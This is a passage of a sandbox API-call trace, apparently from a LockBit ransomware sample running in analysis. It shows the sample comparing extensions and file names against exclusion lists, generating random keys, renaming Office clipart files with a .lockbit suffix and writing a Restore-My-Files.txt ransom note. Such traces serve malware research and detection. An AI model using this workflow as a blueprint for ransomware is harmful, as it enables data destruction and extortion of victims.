lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.692] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.693] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.693] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.694] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HM00426_.WMF") returned 1 [0118.694] lstrcmpiW (lpString1="ntldr", lpString2="HM00426_.WMF") returned 1 [0118.694] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HM00426_.WMF") returned 1 [0118.694] lstrcmpiW (lpString1="bootsect.bak", lpString2="HM00426_.WMF") returned -1 [0118.694] lstrcmpiW (lpString1="autorun.inf", lpString2="HM00426_.WMF") returned -1 [0118.695] lstrcmpiW (lpString1="thumbs.db", lpString2="HM00426_.WMF") returned 1 [0118.695] lstrcmpiW (lpString1="iconcache.db", lpString2="HM00426_.WMF") returned 1 [0118.695] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.695] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF") returned=".WMF" [0118.695] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.695] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.695] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.696] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.696] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.lockbit") returned 72 [0118.696] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00426_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.703] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.703] malloc (_Size=0x40068) returned 0x3ef0008 [0118.703] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=68776) returned 1 [0118.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0118.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0118.704] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.716] malloc (_Size=0xa6) returned 0x77d7a8 [0118.717] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.717] free (_Block=0x77d7a8) [0118.717] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00426_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.717] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.718] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1c0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="HTECH_01.MID", cAlternateFileName="")) returned 1 [0118.718] lstrcmpiW (lpString1=".", lpString2="HTECH_01.MID") returned -1 [0118.718] lstrcmpiW (lpString1="..", lpString2="HTECH_01.MID") returned -1 [0118.718] PathFindExtensionW (pszPath="HTECH_01.MID") returned=".MID" [0118.718] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0118.718] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0118.718] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0118.718] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0118.718] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0118.718] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0118.718] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0118.719] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0118.719] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0118.720] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0118.720] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0118.720] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0118.720] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0118.720] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0118.720] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0118.720] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0118.720] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0118.720] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0118.720] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0118.720] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HTECH_01.MID") returned 1 [0118.720] lstrcmpiW (lpString1="ntldr", lpString2="HTECH_01.MID") returned 1 [0118.720] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HTECH_01.MID") returned 1 [0118.720] lstrcmpiW (lpString1="bootsect.bak", lpString2="HTECH_01.MID") returned -1 [0118.720] lstrcmpiW (lpString1="autorun.inf", lpString2="HTECH_01.MID") returned -1 [0118.720] lstrcmpiW (lpString1="thumbs.db", lpString2="HTECH_01.MID") returned 1 [0118.720] lstrcmpiW (lpString1="iconcache.db", lpString2="HTECH_01.MID") returned 1 [0118.720] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.720] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID") returned=".MID" [0118.720] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0118.720] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0118.720] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0118.720] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0118.721] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0118.721] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0118.721] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.lockbit") returned 72 [0118.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0118.729] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.729] malloc (_Size=0x40068) returned 0x3df0008 [0118.729] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7178) returned 1 [0118.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0118.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0118.730] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0118.741] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.741] malloc (_Size=0xa6) returned 0x77d7a8 [0118.741] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.742] free (_Block=0x77d7a8) [0118.742] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.742] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.742] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.743] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c11ec00, ftCreationTime.dwHighDateTime=0x1bd4b2c, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c11ec00, ftLastWriteTime.dwHighDateTime=0x1bd4b2c, nFileSizeHigh=0x0, nFileSizeLow=0x486, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00046_.WMF", cAlternateFileName="")) returned 1 [0118.743] lstrcmpiW (lpString1=".", lpString2="IN00046_.WMF") returned -1 [0118.743] lstrcmpiW (lpString1="..", lpString2="IN00046_.WMF") returned -1 [0118.743] PathFindExtensionW (pszPath="IN00046_.WMF") returned=".WMF" [0118.743] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.743] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.744] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.744] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00046_.WMF") returned 1 [0118.745] lstrcmpiW (lpString1="ntldr", lpString2="IN00046_.WMF") returned 1 [0118.745] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00046_.WMF") returned 1 [0118.745] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00046_.WMF") returned -1 [0118.745] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00046_.WMF") returned -1 [0118.745] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00046_.WMF") returned 1 [0118.745] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00046_.WMF") returned -1 [0118.745] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.745] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned=".WMF" [0118.745] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.745] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.745] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.746] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.746] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.lockbit") returned 72 [0118.747] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.751] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, 